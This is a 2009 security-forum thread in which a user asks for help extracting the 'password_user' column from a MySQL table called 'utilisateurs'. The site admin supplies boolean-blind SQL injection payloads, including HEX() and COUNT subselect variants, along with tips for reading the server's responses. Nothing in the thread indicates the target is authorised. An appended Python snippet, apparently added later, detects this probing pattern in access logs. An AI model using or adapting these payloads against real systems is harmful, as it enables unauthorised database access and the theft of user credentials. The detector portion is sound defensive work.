IT Security and Insecurity Portal

how to read my blob column from mysql ( how can help me ? )

Posted: Wed Nov 25, 2009 12:20 am

cr4ps
Advanced user
Joined: May 06, 2009
Posts: 91

Hey, I need your help. A column specified "password_user": I'm not able to select it, as it exists in table "utilisateurs", and I got the following message: "Internet Explorer can not display the page Web". I selected another column named "login_user" and I was able to display it, but "password_user" can't be selected . . .

Code:
8 and ascii(substring((SELECT login_user from utilisateurs where id_user=1 limit 0,1),1,1))>100

Code:
8 and ascii(substring((SELECT password_user from utilisateurs where id_user=1 limit 0,1),1,1))>100

Thanks in advance . . .

Last edited by cr4ps on Mon Dec 07, 2009 11:51 am; edited 1 time in total

Posted: Wed Nov 25, 2009 10:32 am

waraxe
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu

Try using HEX():

Code:
8 and ascii(substring((SELECT HEX(password_user) from utilisateurs where id_user=1 limit 0,1),1,1))>100

And if you are using IE (which is a bad idea anyway, because Firefox is better), then make sure that "Show friendly HTTP error messages" in Advanced Options is turned off. In this case you will see the actual server response, not that nonsense "The webpage cannot be found". An even better choice is to use Firefox + the Live HTTP Headers add-on and watch for server response details.

Posted: Wed Nov 25, 2009 11:22 am

cr4ps

waraxe wrote:
> Try using HEX():
>
> Code:
> 8 and ascii(substring((SELECT HEX(password_user) from utilisateurs where id_user=1 limit 0,1),1,1))>100
>
> And if you are using IE (which is a bad idea anyway, because Firefox is better), then make sure that "Show friendly HTTP error messages" in Advanced Options is turned off. In this case you will see the actual server response, not that nonsense "The webpage cannot be found". An even better choice is to use Firefox + the Live HTTP Headers add-on and watch for server response details.

Hi, thank you for the reply, but it didn't work. I did like you said, but it doesn't work. Could you help me a little more?

Posted: Wed Nov 25, 2009 11:32 am

waraxe

What was the server's response? If the server responds with a 4xx status code, then probably an IPS/WAF kicks in.

Posted: Wed Nov 25, 2009 12:00 pm

cr4ps

waraxe wrote:
> What was the server's response? If the server responds with a 4xx status code, then probably an IPS/WAF kicks in.

Server response is 200.

Posted: Wed Nov 25, 2009 12:08 pm

waraxe

OK, try something more generic:
Code:
8 and (SELECT COUNT(password_user) from utilisateurs)>0
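
Seen from the server side, the requests in this thread share one shape: a boolean operator followed by a compared subselect, repeated with only the character position and threshold changing, and answered with 200 rather than a 4xx from an IPS/WAF. The following is an added example, not part of the original thread, that flags that pattern in access-log data; the `/page.php` and `/search.php` endpoints, the IP addresses and the log entries are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample: (client IP, request target). The endpoints and the
# addresses are hypothetical; the payloads are the ones quoted in the thread.
PROBE = ("/page.php?id=8+and+ascii(substring((SELECT+HEX(password_user)+from+"
         "utilisateurs+where+id_user=1+limit+0,1),{pos},1))%3E{thr}")
SAMPLE_LOG = (
    [("203.0.113.7", PROBE.format(pos=p, thr=t))
     for p, t in [(1, 100), (1, 50), (1, 75), (2, 100)]]
    + [("203.0.113.7", "/page.php?id=8+and+(SELECT+COUNT(password_user)"
                       "+from+utilisateurs)%3E0"),
       ("198.51.100.20", "/page.php?id=8"),
       ("198.51.100.20", "/search.php?q=salt+and+pepper+(select+brands)")]
)

# A boolean operator followed by a parenthesised subselect whose result is compared.
INFERENCE = re.compile(
    r"\b(?:and|or)\b.*\(\s*select\b.*\bfrom\b.*\)\s*[<>=]", re.I | re.S)

def template(query):
    """Decode, lower-case and replace every number with N, so probes that differ
    only in character position or threshold collapse into one template."""
    return re.sub(r"\d+", "N", unquote_plus(query).lower())

def find_blind_sqli(log, min_probes=3):
    """Return {(ip, template): count} for clients repeating one inference template."""
    counts = defaultdict(int)
    for ip, target in log:
        query = target.partition("?")[2]
        if INFERENCE.search(unquote_plus(query)):
            counts[(ip, template(query))] += 1
    return {key: n for key, n in counts.items() if n >= min_probes}

if __name__ == "__main__":
    for (ip, tmpl), n in find_blind_sqli(SAMPLE_LOG).items():
        print(f"{ip}: {n} probes matching {tmpl}")
```

Grouping by template rather than alerting on a single match keeps one-off false positives quiet while still surfacing the repeated probing that character-by-character extraction requires.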

Posted: Wed Nov 25, 2009 12:18 pm

cr4ps

Posted: Mon Dec 07, 2009 11:54 am

cr4ps

All times are GMT